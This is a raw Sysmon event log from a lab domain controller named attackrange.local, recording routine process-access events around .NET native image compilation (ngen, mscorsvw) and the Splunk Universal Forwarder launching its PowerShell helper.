13:25:18.648{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463E-6000-8E03-000000009A01}3368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007768Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.633{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-463E-6000-8E03-000000009A01}3368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007767Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.633{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463E-6000-8E03-000000009A01}3368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007766Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.601{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463E-6000-8D03-000000009A01}4452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007765Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.586{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-463E-6000-8D03-000000009A01}4452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007764Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.586{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463E-6000-8D03-000000009A01}4452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007763Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.570{08A6967A-463E-6000-8B03-000000009A01}50244788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007762Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:18.570{08A6967A-463E-6000-8C03-000000009A01}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11f0-0\Microsoft.GroupPolicy.Targeting.Interop.dll2021-01-14 13:25:18.570 10341000x80000000000000007761Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.476{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463E-6000-8C03-000000009A01}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007760Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.461{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-463E-6000-8C03-000000009A01}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007759Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.461{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463E-6000-8C03-000000009A01}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007758Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.429{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-463E-6000-8B03-000000009A01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007757Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007756Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007755Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007754Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007753Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007752Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007751Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007750Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007749Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.429{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007748Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.429{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-463E-6000-8B03-000000009A01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007747Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.429{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-463E-6000-8B03-000000009A01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007746Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.430{08A6967A-463E-6000-8B03-000000009A01}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007745Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.414{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463E-6000-8A03-000000009A01}2620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007744Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.398{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-463E-6000-8A03-000000009A01}2620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007743Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:18.398{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463E-6000-8A03-000000009A01}2620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\W